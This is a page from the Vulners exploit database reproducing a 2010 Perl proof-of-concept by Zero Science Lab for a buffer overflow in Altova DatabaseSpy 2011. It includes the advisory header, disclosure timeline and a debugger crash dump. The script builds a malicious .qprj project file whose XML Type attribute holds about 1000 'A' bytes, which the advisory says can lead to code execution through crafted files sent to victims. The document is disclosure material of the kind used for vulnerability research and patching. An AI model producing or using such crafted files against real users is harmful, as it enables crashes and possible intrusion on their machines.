Vulners
Lucene search
Altova DatabaseSpy 2011 Buffer Overflow
`#!/usr/bin/perl
#
#
# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
#
#
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
#
#
# Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
#
#
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundry checking of some XML tag
# property values, ex: <Folder FolderName="SQL" Type="AAAAAAA..../>" (~1000 bytes).
# This can aid the attacker to execute arbitrary machine code in the context of an
# affected node (locally and remotely) via file crafting or computer-based social
# engineering.
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#----------------------------------------------------------------------------------#
#
# (342c.37c0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=04430041 ebx=0203ff98 ecx=0443deda edx=56413f2e esi=0022dd98 edi=00000016
# eip=00420b83 esp=0022dc00 ebp=00000017 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for
# DatabaseSpy.exe - DatabaseSpy+0x20b83:
# 00420b83 663b02 cmp ax,word ptr [edx] ds:0023:56413f2e=????
#
#----------------------------------------------------------------------------------#
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status: [17.10.2010] Vulnerability discovered.
# [17.10.2010] Initial contact with the vendor with sent PoC files.
# [21.10.2010] No reply from vendor.
# [22.10.2010] Public advisory released.
#
#
# Advisory ID: ZSL-2010-4971
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4971.php
# Advisory TXT: http://www.zeroscience.mk/codes/dbspy_bof.txt
#
#
# 17.10.2010
#
use strict;
system cls;
sub header()
{
print "
@=---===---===---===---===---===---===---===---=@
| |
| Proof Of Concept PERL script for |
| |
| Altova DatabaseSpy 2011 (Enteprise Edition) |
| |
| |
| |
| |
| --- |
| |
| Copyleft (c) 2010 |
| |
| Zero Science Lab - http://www.zeroscience.mk |
| |
@=---===---===---===---===---===---===---===---=@
\n\n";
}
my $FILENAME = "DEATH_FROM_ABOVE.qprj"; #DatabaseSpy Project File
my $PAYLOAD = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". #48
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; #1008B
#21
my $PROJECT = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\xA<!-".
"- DatabaseSpy Project File -->\xA<Project Vers".
"ion=\"2\" Expanded=\"Yes\" Type=\"Root\" Title=".
"\"test\">\xA\x9<Folder FolderName=\"Data Sources".
"\" Type=\"DataSourceFolder\"/>\xA\x9<Folder Fol".
"derName=\"SQL\" Type=\"SQLRootFolder\" database".
"_kind=\"Unknown\" datasource=\"Offline\" descrip".
"tion=\"Store and organize SQL files for this pro".
"ject.\" blockingstrategy=\"semi\"/>\xA\x9<Folder".
" FolderName=\"Design\" Type=\"$PAYLOAD\" databas".
"e_kind=\"Unknown\" datasource=\"Offline\" descri".
"ption=\"I LOVE VERONICA CORNINGSTONE.\"/>\xA\x9<".
"Folder FolderName=\"Data Diff\" Type=\"DataDiffR".
"ootFolder\"/>\xA\x9<Folder FolderName=\"Schema D".
"iff\" Type=\"Schema DiffRootFolder\"/>\xA\x9<Fol".
"der FolderName=\"Favorites\" Type=\"FavoriteFold".
"er\"/>\xA</Project>\xA";
sub code()
{
system ("color 3"); #~!@#$%^&*()_+|<>?:"{}=-`';/.,0
open qprj, ">./$FILENAME" || die "\nCan't open #$_@
$FILENAME: $!"; print "\n (1) "; system("pause"); #
print qprj $PROJECT; print "\n (2) Buffering mali".
"cious format file . . .\r\n"; sleep 2; close qprj;
print "\n (3) File $FILENAME created successfully".
"!\n"; sleep 2; system ("color \x44"); sleep 1; #.%
print "\n (4) And the color is changed.\n";
}
print "\n";
header();
code();
#EOF
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Oct 2010 00:00Current
0.9Low risk
Vulners AI Score0.9